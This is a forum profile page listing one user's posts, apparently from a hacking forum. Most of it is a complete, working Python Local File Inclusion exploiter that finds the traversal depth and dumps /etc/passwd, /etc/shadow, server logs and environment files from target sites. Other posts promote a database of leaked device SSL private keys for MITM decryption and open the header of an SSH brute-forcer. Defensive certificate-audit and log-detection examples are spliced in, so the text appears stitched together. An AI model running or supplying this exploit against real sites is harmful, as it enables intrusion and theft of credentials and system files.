Everything posted by adi003user
-
it, scriptkids, know-how
-
LittleBlackBox is a collection of thousands of private SSL keys extracted from various embedded devices. These private keys are stored in a database where they are correlated with their public SSL certificates as well as the hardware/firmware that are known to use those SSL keys.

A command line utility is included to aid in the identification of devices or network traffic that use these known private keys. Given a public SSL certificate, the utility will search the database to see if it has a corresponding private key; if so, the private key is displayed and can be used for traffic decryption or MITM attacks. Alternatively, it will also display a table of hardware and firmware that is known to use that private key.

The utility can obtain a public certificate several different ways:
  You may give it the path to a public certificate file.
  You may give it the SHA1 hash of a public certificate.
  Given a host, it will retrieve the host's public SSL certificate.
  Given a pcap file, it will parse the file looking for public certificate exchanges.
  Given a live network interface, it will listen for public certificate exchanges.

http://code.google.com/p/littleblackbox/
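The lookup described above turns on the certificate's SHA1 fingerprint, which an asset owner can use to find devices still serving a firmware-default certificate. The following is an added example, not part of the original post or of LittleBlackBox: the function names, the byte strings standing in for DER certificates, and the device label are all constructed, and the table does not reflect the project's real schema.

```python
import base64
import hashlib
import re

PEM_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----(.+?)-----END CERTIFICATE-----", re.S)


def to_pem(der):
    """Wrap raw DER bytes in PEM armour (used here only to build sample input)."""
    b64 = base64.b64encode(der).decode("ascii")
    rows = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(rows)
            + "\n-----END CERTIFICATE-----\n")


def normalise_fingerprint(text):
    """Accept 'AA:BB:..', 'aa bb ..' or plain hex; return 40 lowercase hex chars."""
    hexonly = re.sub(r"[\s:]", "", text).lower()
    if not re.fullmatch(r"[0-9a-f]{40}", hexonly):
        raise ValueError("not a SHA1 fingerprint: %r" % text)
    return hexonly


def pem_fingerprints(pem_text):
    """SHA1 over the DER bytes (not the PEM text) of every certificate in a bundle."""
    prints = []
    for body in PEM_RE.findall(pem_text):
        der = base64.b64decode("".join(body.split()), validate=True)
        prints.append(hashlib.sha1(der).hexdigest())
    return prints


def audit(inventory, known):
    """Map each asset to the known-key entries its certificate(s) match.

    inventory: asset name -> PEM text (one or more certificates) or a fingerprint.
    known:     fingerprint -> list of device/firmware labels.
    """
    findings = {}
    for asset, value in sorted(inventory.items()):
        if "BEGIN CERTIFICATE" in value:
            prints = pem_fingerprints(value)
        else:
            prints = [normalise_fingerprint(value)]
        hits = [(fp, known[fp]) for fp in prints if fp in known]
        if hits:
            findings[asset] = hits
    return findings


# Constructed sample data: the byte strings stand in for DER certificates
# and the device label is invented.
SHARED_DER = b"constructed DER bytes: firmware-default certificate"
UNIQUE_DER = b"constructed DER bytes: certificate generated on first boot"
SHARED_FP = hashlib.sha1(SHARED_DER).hexdigest()
KNOWN = {SHARED_FP: ["ExampleVendor router, firmware 1.0 (constructed)"]}

INVENTORY = {
    "branch-router": to_pem(SHARED_DER),
    "core-switch": to_pem(UNIQUE_DER),
    # Fingerprint as many tools print it: upper case, colon separated.
    "vpn-gateway": ":".join(SHARED_FP[i:i + 2] for i in range(0, 40, 2)).upper(),
    # A bundle: only one of the two certificates is a known default.
    "proxy-bundle": to_pem(UNIQUE_DER) + to_pem(SHARED_DER),
}

if __name__ == "__main__":
    for asset, hits in audit(INVENTORY, KNOWN).items():
        for fp, devices in hits:
            print("%s serves a certificate with a published key: %s (%s)"
                  % (asset, fp, "; ".join(devices)))
```

Any asset that shows up in the result needs a freshly generated key pair and certificate, since the shared key cannot be made private again.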
-
I like turtles, and python's idea.
-
48 people in the mountains. Snowboarding. Envy me.
-
#!/usr/bin/python
# Simple Local File Inclusion Exploiter, version 1.2
# by Valentin Hoebel (valentin@xenuser.org)

# ASCII FOR BREAKFAST

# ---------- [Description]
# This tool helps you to exploit LFI (Local File Inclusion) vulnerabilities.
# After you found a LFI vulnerability simply pass the affected URL
# and vulnerable parameter to this tool.
# You can also use this tool to scan a URL for LFI vulnerabilities.

# ---------- [Features]
# - This time with working random user agents
# - Checks if a connection to the target can be established
# - Some error handling
# - Scans a parameter of a URL for a LFI vulnerability
# - Finds out how a LFI vulnerability can be exploited (e.g. directory depth)
# - Supports nullbytes
# - Dumps a list of interesting files (e.g. /etc/passwd and logs) to the hard disk
# - Supports common *nix targets, but no Windows systems.
# - Creates a small log file.

# Supports no SEO URLs, such as www.example.com/local-news/
# But in most cases it is possible to find out the real URL and pass it to this script.

# ---------- [Usage example]
# ./lfi_sploiter.py --exploit-url="http://www.example.com/page.php?url=main" --vulnerable-parameter="url"

# The tool then assumes that the parameter "url" is vulnerable and attacks the target.
# When you do not know which parameter is vulnerable simply try one parameter after another,
# this tool will scan the parameter and tell you if it is vulnerable But only pass one parameter at once!

# ---------- [Known issues]
# - I know there is more about LFI than it is covered in this tool. But this is the first release,
#   and more features will be implemented in future versions.
# - This tool is only able to handle "simple" LFI vulnerabilities, but not complex ones.
#   For example: Some LFI vulnerabilities consist of two URL parameters or require to
#   find a way around filters. In those cases, this tool unfortunately does not work.
# - Like most other LFI exploiter / scanner, this tool here also has problems with
#   handling certain server responses. So this tool does not work with every website.

# ---------- [Tested with]
# Targets: Apache2 servers and PHP websites, various Linux systems
# Script platform: Ubuntu Lucid Lynx and Python 2.6.5

# ---------- [Notes]
# - This tool was developed using a Python 2.6.5 interpreter.
# - I admit: This tool is a little bit slow and not very efficient (too many variables etc.). Sorry about that
# - Modify, distribute, share and copy this code in any way you like!
# - Please note that this tool was created and published for educational purposes only, e.g. for pentesting
#   your own website. Do not use it in an illegal way and always know + respect your local laws.
#   I am not responsible if you cause any damage with it.

# ---------- [Changelog]
# - Version 1.2 (05th December 2010):
#   - Added some more "interesting files"
#
# - Version 1.1 (23th November 2010):
#   - Added new log file <domain name>-details.txt which contains some information about the current scan
#   - Added some more "interesting files"
#   - Added some more user agents
#
# - Version 1.0 (21th November 2010):
#   - Initial release

# Power to the cows!

import getopt, sys, random, urllib, urllib2, httplib, re, string, os
from urllib2 import Request, urlopen, URLError, HTTPError
from urlparse import urlparse
from time import gmtime, strftime

def print_usage():
    print_banner()
    print "[!] Wrong argument and parameters passed. Use --help and learn how to use this tool :)"
    print "[i] Hint: You need to pass a value for --exploit-url=\"<value>\" and --vulnerable-parameter=\"<value>\"."
    print "[i] Example: ./lfi_sploiter.py --exploit-url=\"http://www.example.com/page.php?file=main\" --vulnerable-parameter=\"file\" "
    print ""
    print ""
    sys.exit()
    return

def print_help():
    print_banner()
    print "((Displaying the content for --help.))"
    print ""
    print "[Description]"
    print "The Simple Local File Inclusion Exploiter helps you to"
    print "exploit LFI vulnerabilities. After you found one, simply"
    print "pass the URL of the affected website and the vulnerable"
    print "parameter to this tool. You can also use this tool"
    print "to scan a parameter of an ULR for a LFI vulnerability."
    print ""
    print "[Usage]"
    print "./lfi_sploiter.py --exploit-url=\"<URL with http://>\" --vulnerable-parameter=\"<parameter>\""
    print ""
    print "[Usage example]"
    print "./lfi_sploiter.py --exploit-url=\"http://www.example.com/page.php?file=main\" --vulnerable-parameter=\"file\" "
    print ""
    print "[Usage notes]"
    print "- Always use http://...."
    print "- When you pass a vulnerable parameter, this tool assumes that it is really vulnerable."
    print "- If you do not know if a parameter is vulnerable, simply pass it to this script and let the scanner have a look."
    print "- Only use one vulnerable parameter at once."
    print "- This tool does not work with SEO URLs, such as http://www.example.com/news-about-the-internet/."
    print " If you only have a SEO URL, try to find out the real URL which contents parameters."
    print ""
    print "[Feature list]"
    print "- Provides a random user agent for the connection."
    print "- Checks if a connection to the target can be established."
    print "- Tries catch most errors with error handling. "
    print "- Contains a LFI scanner (only scans one parameter at once)."
    print "- Finds out how a LFI vulnerability can be exploited (e.g. directory depth)."
    print "- Supports nullbytes!"
    print "- Exploit features: Dumps a list of interesting files to your hard disk."
    print "- Supports common *nix targets, but no Windows systems."
    print "- Creates a small log file."
    print ""
    print "[Some notes]"
    print "- Tested with Python 2.6.5."
    print "- Modify, distribute, share and copy the code in any way you like!"
    print "- Please note that this tool was created for educational purposes only."
    print "- Do not use this tool in an illegal way. Know and respect your local laws."
    print "- Only use this tool for legal purposes, such as pentesting your own website :)"
    print "- I am not responsible if you cause any damage or break the law."
    print "- Power to teh c0ws!"
    print ""
    print ""
    sys.exit()
    return

def print_banner():
    print ""
    print ""
    print ""
    print "Simple Local File Inclusion Exploiter"
    print "by Valentin Hoebel (valentin@xenuser.org)"
    print ""
    print "Version 1.2 (05th December 2010) ^__^"
    print " (oo)\________"
    print " (__)\ )\/\ "
    print " ||----w |"
    print "Power to teh cows! || ||"
    print "____________________________________________________"
    print ""
    return

def test_url(exploit_url):
    print ""
    print "[i] Assuming the provided data was correct."
    print "[i] Trying to establish a connection with a random user agent..."

    user_agents = [
        "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.9)",
        "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01 ",
        "Opera/8.00 (Windows NT 5.1; U; en)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19 "
    ]
    user_agent = random.choice (user_agents)
    check=""

    request_website = urllib2.Request(exploit_url)
    request_website.add_header('User-Agent', user_agent)

    try:
        check = urllib2.urlopen(request_website)
    except HTTPError, e:
        print "[!] The connection could not be established."
        print "[!] Error code: ", e
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    except URLError, e:
        print "[!] The connection could not be established."
        print "[!] Reason: ", e
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    else:
        print "[i] Connected to target! URL seems to be valid."
        print "[i] Jumping to the exploit feature."
    return

def exploit_lfi(exploit_url, vulnerable_parameter):
    print ""

    # Define all variables of this function
    # I know, there are more efficient ways of handling all the "problems" we encounter later in this script,
    # but well, I am still learning
    lfi_found = 0
    param_equals = "="
    param_sign_1 = "?"
    param_sign_2 = "&"
    nullbyte = "%00"
    one_step_deeper = "../"
    for_the_first_test = "/"
    for_changing_the_dump_file_name = "_"
    for_the_second_test = ".."
    max_depth = 20
    i = 0
    nullbyte_required = 1
    depth = 0
    original_vulnerable_parameter_value = ""
    query_string = ""
    modified_query_string = ""
    lfi_url_part_one = ""
    lfi_url_part_two = ""
    lfi_url_part_three = ""
    lfi_url_part_four = ""
    lfi_url = ""
    find_nasty_string = "root:x:0:0:"
    find_nasty_string_2 = "mail:x:8:"
    user_agents = [
        "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8",
        "Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6)",
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en)",
        "Mozilla/3.01 (Macintosh; PPC)",
        "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.9)",
        "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
        "Opera/8.00 (Windows NT 5.1; U; en)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19"
    ]
    user_agent = random.choice (user_agents)
    lfi_response=""
    lfi_response_source_code = ""
    replace_string = ""
    replace_string_2 = ""
    replace_me = ""
    value_for_vulnerable_parameter = ""
    value_for_vulnerable_parameter_2 = ""
    exploit_depth= 0
    folder_name = ""
    cd_into = ""
    change_dump_filename = ""
    log_file_name = ""

    # I know, some of these are rarely accessible for the webserver, but you never know... it is worth the try!
    # Never ever change the first line!
    local_files = [
        "etc/passwd",
        "proc/self/environ",
        "var/log/apache2/access.log",
        "var/log/apache2/access_log",
        "var/log/apache2/error.log",
        "var/log/apache2/error_log",
        "var/log/httpd/access.log",
        "var/log/httpd/access_log",
        "var/log/httpd/error.log",
        "var/log/httpd/error_log",
        "var/log/nginx/access.log",
        "var/log/nginx/access_log",
        "var/log/nginx/error.log",
        "var/log/nginx/error_log",
        "etc/shadow",
        "etc/group",
        "var/log/auth.log",
        "proc/self/status",
        "proc/self/mounts",
        "proc/cpuinfo",
        "proc/meminfo",
        "etc/apache2/httpd.conf",
        "etc/apache2/apache2.conf",
        "etc/apache2/envvars"
    ]

    # We have to split up the URL in order to replace the value of the vulnerable parameter
    get_parsed_url = urlparse(exploit_url)
    print "[i] For exploiting the LFI vulnerability we need to split the URL into its parts."
    print "[i] IP address / domain: " + get_parsed_url.netloc

    if len(get_parsed_url.path) == 0:
        print "[!] The URL doesn't contain a script (e.g. target/index.php)."
    else:
        print "[i] Script:", get_parsed_url.path
    if len(get_parsed_url.query) == 0:
        print "[!] The URL doesn't contain a query string (e.g. index.php?var1=x&controller=main)."
    else:
        print "[i] URL query string:", get_parsed_url.query
    print ""

    # Finding all URL parameters
    if param_sign_1 in exploit_url and param_equals in exploit_url:
        print "[i] It seems that the URL contains at least one parameter."
        print "[i] Trying to find also other parameters..."

        # It seems that there is at least one parameter in the URL. Trying to find out if there are also others...
        if param_sign_2 in get_parsed_url.query and param_equals in get_parsed_url.query:
            print "[i] Also found at least one other parameter in the URL."
        else:
            print "[i] No other parameters were found."
    else:
        print ""
        print "[!] It seems that there is no parameter in the URL."
        print "[!] How am I supposed to find a vulnerability?"
        print "[!] Please provide an URL with a script and query string."
        print "[!] Example: target/index.php?cat=1&article_id=2&controller=main"
        print "[!] Hint: I can't handle SEO links, so try to find an URL with a query string."
        print "[!] This can most likely be done by having a look at the source code (rightclick -> show source code in your browser)."
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)

    # Detect the parameters
    # Thanks to atomized.org for the URL splitting and parameters parsing part!
    parameters = dict([part.split('=') for part in get_parsed_url[4].split('&')])

    # Count the parameters
    parameters_count = len(parameters)

    # Print the parameters and store them in single variables
    print "[i] The following", parameters_count, "parameter(s) was/were found:"
    print "[i]", parameters

    # Check if the URL contains the provided vulnerable parameter
    print ""
    print "[i] According to you, the vulnerable parameter should be: " + vulnerable_parameter
    print "[i] Checking if this parameter exists in the provided URL..."

    if vulnerable_parameter in get_parsed_url.query:
        print "[i] Found your vulnerable parameter in the URL."
    else:
        print "[!] I was not able to find your vulnerable parameter within the provided URL."
        print "[!] How am I supposed to exploit the LFI vulnerabililty then?"
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)

    # We now try to find out how this LFI vulnerability can be exploited
    # a) How deep do we need to go (../../......) and do we need to use the nullbyte? =)
    # We find this out by trying to access the /etc/passwd file.. it should always be accessible.
    print ""
    print "[i] Now trying to find out how this LFI vulnerability can be exploited..."
    print "[i] This can take a while."
    value_for_vulnerable_parameter = for_the_first_test
    value_for_vulnerable_parameter += value_for_vulnerable_parameter.join(local_files[0:1])
    value_for_vulnerable_parameter_2 = "".join(local_files[0:1])
    value_for_vulnerable_parameter_with_nullbyte = value_for_vulnerable_parameter + nullbyte
    value_for_vulnerable_parameter_with_nullbyte_2 = value_for_vulnerable_parameter_2 + nullbyte
    query_string = get_parsed_url.query

    # Find out what value the vulnerable parameter currently has
    for key, value in parameters.items():
        if key == vulnerable_parameter:
            # Save the value of the vulnerable parameter, so we later can search in in the URL
            original_vulnerable_parameter_value = value

    # Our main routine, maybe the most important part of this script
    # At first without the nullbyte
    for depth in range(i, max_depth):
        # Replace the default value of the vulnerable parameter with our LFI string
        replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter_2
        replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter_2

        if depth== 0:
            replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter
            replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter

        replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value
        modified_query_string = query_string.replace(replace_me, replace_string_2)

        # Now craft the URL
        lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://"
        lfi_url_part_two = "".join(get_parsed_url[1:2])
        lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?"
        lfi_url_part_four = "".join(modified_query_string)
        lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four

        # Ok, everything is prepared to enter subspace.. eeh, to call the URL (Stargate fans get this joke!)
        request_website = urllib2.Request(lfi_url)
        request_website.add_header('User-Agent', user_agent)

        try:
            lfi_response = urllib2.urlopen(request_website)
        except URLError, e:
            print "[!] The connection could not be established."
            print "[!] Reason: ", e
        else:
            lfi_response_source_code = lfi_response.read()
            if find_nasty_string in lfi_response_source_code:
                print "[+] Found signs of a successfull LFI vulnerability! No nullbyte was required."
                print "[+] URL: " + lfi_url
                nullbyte_required = 0
                lfi_found = 1
                exploit_depth = depth
                break
            else:
                if find_nasty_string_2 in lfi_response_source_code:
                    print "[+] Found signs of a successfull LFI vulnerability! No nullbyte was required."
                    print "[+] URL: " + lfi_url
                    nullbyte_required = 0
                    lfi_found = 1
                    exploit_depth = depth
                    break

    if nullbyte_required == 1:
        # Now with the nullbyte
        for depth in range(i, max_depth):
            # Replace the default value of the vulnerable parameter with our LFI string
            replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte_2
            replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte_2

            if depth== 0:
                replace_string = (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte
                replace_string_2 = vulnerable_parameter + param_equals + (depth * one_step_deeper) + value_for_vulnerable_parameter_with_nullbyte

            replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value
            modified_query_string = query_string.replace(replace_me, replace_string_2)

            # Now craft the URL
            lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://"
            lfi_url_part_two = "".join(get_parsed_url[1:2])
            lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?"
            lfi_url_part_four = "".join(modified_query_string)
            lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four

            # Ok, everything is prepared to enter subspace.. eeh, to call the URL (Stargate fans get this joke!)
            request_website = urllib2.Request(lfi_url)
            request_website.add_header('User-Agent', user_agent)

            try:
                lfi_response = urllib2.urlopen(request_website)
            except URLError, e:
                print "[!] The connection could not be established."
                print "[!] Reason: ", e
            else:
                lfi_response_source_code = lfi_response.read()
                if find_nasty_string in lfi_response_source_code:
                    print "[+] Found signs of a successfull LFI vulnerability! Using the nullbyte was necessary."
                    print "[+] URL: " + lfi_url
                    lfi_found = 1
                    exploit_depth = depth
                    break
                else:
                    if find_nasty_string_2 in lfi_response_source_code:
                        print "[+] Found signs of a successfull LFI vulnerability! Using the nullbyte was necessary."
                        print "[+] URL: " + lfi_url
                        lfi_found = 1
                        exploit_depth = depth
                        break

    if lfi_found == 0:
        print "[!] The LFI vulnerability could not be detected."
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit()

    # Now that we know the details of the LFI vulnerability, we can start to exploit it.
    # At first we try to dump all interesting files to your local hard disk
    print ""
    print "[i] Exploiting the LFI vulnerability starts right now."
    print "[i] Trying to dump some interesting files to your local hard disk..."

    # "Craft" the folder name, it contains the scanned website and a formatted timestamp
    folder_name = get_parsed_url.netloc + "_-_" + strftime("%d_%b_%Y_%H:%M:%S_+0000", gmtime())

    # Create the folder, with some error handling
    try:
        os.mkdir(folder_name)
    except OSError:
        print "[!] Something is wrong, the folder could not be created. Check the chmod and chown permissions!"
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)

    cd_into = os.getcwd() + "/" + folder_name + "/"
    os.chdir(cd_into)

    # New since version 1.1: Create a small log file
    log_file_name = folder_name + "_-_scan.log"
    FILE = open(log_file_name, "w")
    FILE.write("Simple Local File Inclusion Exploiter - Log File\n")
    FILE.write("----------------------------------------------------------\n\n")
    FILE.write("Exploited URL:\n")
    FILE.write(exploit_url + "\n\n")
    FILE.write("LFI URL:\n")
    FILE.write(lfi_url)
    FILE.close()

    # Start "calling" the files. Yeeeha!
    for key, file in enumerate(local_files):
        # Craft the URL
        # Consider nullbyte usage...
        if nullbyte_required == 0:
            # Consider that the LFI can be exploited by the first try and that no "cd .."s are needed.
            # Yes, sometimes this works! For example in my test script So this code block has a right to exist, believe it or not =)
            replace_string = (exploit_depth * one_step_deeper) + file
            replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + file

            if exploit_depth == 0:
                replace_string = (exploit_depth * one_step_deeper) + for_the_first_test + file
                replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + for_the_first_test + file

            replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value
            modified_query_string = query_string.replace(replace_me, replace_string_2)
            lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://"
            lfi_url_part_two = "".join(get_parsed_url[1:2])
            lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?"
            lfi_url_part_four = "".join(modified_query_string)
            lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four
            request_website = urllib2.Request(lfi_url)
            request_website.add_header('User-Agent', user_agent)

            try:
                lfi_response = urllib2.urlopen(request_website)
            except URLError, e:
                print "[!] The connection could not be established."
                print "[!] Reason: ", e
            else:
                lfi_response_source_code = lfi_response.read()

                # Dump the file
                # We need to replace the "/" with underscores
                change_dump_filename = file.replace(for_the_first_test, for_changing_the_dump_file_name)
                print "[+] Dumping file: " + for_the_first_test + file
                FILE = open(change_dump_filename, "w")
                FILE.write(lfi_response_source_code )
                FILE.close()

        elif nullbyte_required == 1:
            # Consider that the LFI can be exploited by the first try and that no "cd .."s are needed.
            # Yes, sometimes this works! For example in my test script So this code block has a right to exist, believe it or not =)
            replace_string = (exploit_depth * one_step_deeper) + file + nullbyte
            replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + file + nullbyte

            if exploit_depth == 0:
                replace_string = (exploit_depth * one_step_deeper) + for_the_first_test + file + nullbyte
                replace_string_2 = vulnerable_parameter + param_equals + (exploit_depth * one_step_deeper) + for_the_first_test + file + nullbyte

            replace_me = vulnerable_parameter + param_equals + original_vulnerable_parameter_value
            modified_query_string = query_string.replace(replace_me, replace_string_2)
            lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://"
            lfi_url_part_two = "".join(get_parsed_url[1:2])
            lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?"
            lfi_url_part_four = "".join(modified_query_string)
            lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four
            request_website = urllib2.Request(lfi_url)
            request_website.add_header('User-Agent', user_agent)

            try:
                lfi_response = urllib2.urlopen(request_website)
            except URLError, e:
                print "[!] The connection could not be established."
                print "[!] Reason: ", e
            else:
                lfi_response_source_code = lfi_response.read()

                # Dump the file
                # We need to replace the "/" with underscores
                change_dump_filename = file.replace(for_the_first_test, for_changing_the_dump_file_name)
                print "[+] Dumping file: " + for_the_first_test + file
                FILE = open(change_dump_filename, "w")
                FILE.write(lfi_response_source_code )
                FILE.close()

    print "[i] Hint: The files are also dumped when we have no permission to view them."
    print "[i] Instead of the file, the PHP error message will be dumped."
    print ""
    print "[i] Completed the task. Will now exit!"
    print "[i] A small log file was created."
    print "[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool."
    print "[i] Feel free to send in some feedback!"
    print ""
    print""
    sys.exit(1)
    return

def main(argv):
    exploit_url=""
    vulnerable_parameter=""

    try:
        opts, args = getopt.getopt(sys.argv[1:], "", ["help", "exploit-url=", "vulnerable-parameter="])
    except getopt.GetoptError :
        print_usage()
        sys.exit(2)

    for opt, arg in opts:
        if opt in ("--help"):
            print_help()
            break
            sys.exit(1)
        elif opt in ("--exploit-url") :
            exploit_url=arg
        elif opt in ("--vulnerable-parameter"):
            vulnerable_parameter=arg

    if len(exploit_url) < 1:
        print_usage()
        sys.exit()

    if len(vulnerable_parameter) < 1:
        print_usage()
        sys.exit()

    # Continue if all required arguments were passed to the script.
    print_banner()
    print "[i] Provided URL to exploit: " + exploit_url
    print "[i] Provided vulnerable parameter: " + vulnerable_parameter

    # Check if URL is
    test_url(exploit_url)

    # Calling the LFI exploit function
    exploit_lfi(exploit_url, vulnerable_parameter)

if __name__ == "__main__":
    main(sys.argv[1:])

### EOF ###

How?
./lfi_sploiter.py --exploit-url= --vulnerable-parameter=
./lfi_sploiter.py --exploit-url=http://www.site.com/page.php?file=main --v
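The scanner above leaves a recognisable trail in the target's access log: one parameter whose value climbs through successive `../` depths towards a file from its list, optionally followed by `%00`. The following is an added example, not part of the original post or of the tool, that finds that trail in common/combined-format log lines. The log lines are constructed, the function names and the sweep threshold are assumptions, and the decoder also handles double URL-encoding, which goes beyond what the tool itself sends.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Path prefixes taken from the scanner's own "interesting files" list.
SENSITIVE = ("etc/passwd", "etc/shadow", "etc/group", "etc/apache2/",
             "proc/self/", "proc/cpuinfo", "proc/meminfo", "var/log/")

# Common/combined log format: client, request target, status code.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (for example %252e -> %2e -> '.')."""
    for _ in range(rounds):
        once = unquote(value)
        if once == value:
            break
        value = once
    return value


def inspect_value(value):
    """Return traversal details for one parameter value, or None if it looks benign."""
    decoded = fully_decode(value).replace("\\", "/")
    depth = len(re.findall(r"\.\./", decoded))
    nullbyte = "\x00" in decoded
    path = decoded.replace("\x00", "").replace("../", "").lstrip("/")
    target = next((s for s in SENSITIVE if path.startswith(s)), None)
    if depth == 0 and not nullbyte and target is None:
        return None
    return {"depth": depth, "nullbyte": nullbyte, "target": target}


def scan(lines, sweep_threshold=3):
    """Group suspicious requests by client and flag depth sweeps."""
    clients = defaultdict(lambda: {"requests": 0, "ok_responses": 0,
                                   "depths": set(), "targets": set(),
                                   "nullbyte": False})
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, request_target, status = match.groups()
        query = urlsplit(request_target).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            hit = inspect_value(value)
            if hit is None:
                continue
            entry = clients[client]
            entry["requests"] += 1
            entry["ok_responses"] += status == "200"
            entry["depths"].add(hit["depth"])
            entry["nullbyte"] = entry["nullbyte"] or hit["nullbyte"]
            if hit["target"]:
                entry["targets"].add(hit["target"])
    # A sweep is the same client trying several distinct directory depths.
    return {client: dict(entry, sweep=len(entry["depths"]) >= sweep_threshold)
            for client, entry in clients.items()}


# Constructed sample log (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Dec/2010:10:00:00 +0000] "GET /page.php?file=main HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Dec/2010:10:00:01 +0000] "GET /page.php?file=/etc/passwd HTTP/1.1" 200 300',
    '198.51.100.7 - - [05/Dec/2010:10:00:02 +0000] "GET /page.php?file=../etc/passwd HTTP/1.1" 200 300',
    '198.51.100.7 - - [05/Dec/2010:10:00:03 +0000] "GET /page.php?file=../../etc/passwd HTTP/1.1" 200 300',
    '198.51.100.7 - - [05/Dec/2010:10:00:04 +0000] "GET /page.php?file=../../../etc/passwd%00 HTTP/1.1" 200 1804',
    '203.0.113.5 - - [05/Dec/2010:10:05:00 +0000] "GET /page.php?file=%252e%252e%252fetc%252fgroup HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, entry in sorted(scan(SAMPLE_LOG).items()):
        print(client, entry)
```

A jump in response size on the last request of a sweep is the cue to check whether the file was actually served, because the tool stops climbing as soon as it sees passwd content.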
-
Interesting idea. Why does a CC also go to your address?
-
I think RST should become invitation-based and/or interview-based. Honestly.
-
1. I don't like that it's wide when there is no information, or the information isn't laid out properly, to fill that space.
2. I don't like the logo. It's ancient and I think it was stolen from Office 97.
-
The kid is right. Try the following: http://www.nasa.gov/hiddenadminpanel(supersecret) It will show page not found, but that's only because the page is super secret. View source on it. Copy-paste the code into Delphi 6 (it has to be 6). Build it (you get some errors, but it works). Run the script on a virtual virtual machine (that is, virtual twice over) with the following command: sudo perl install ./script_name - NASA's IP - your IP. A page opens with the NASA login details and a link where you can log in. Simple. If you can't manage it, send 50 euros via PayPal and, on top of the login details, I'll throw in as a bonus my bot network (Zeus), which I keep in the cellar.
-
I didn't even know about SHA-3, but I suspect only 5% of the members are interested in these things... Thanks for the info. I have a question, maybe a stupid one: will it be used in SSH?
-
#!/usr/bin/perl -w
# $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.12 2009-12-10 01:25:47 timb Exp $
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
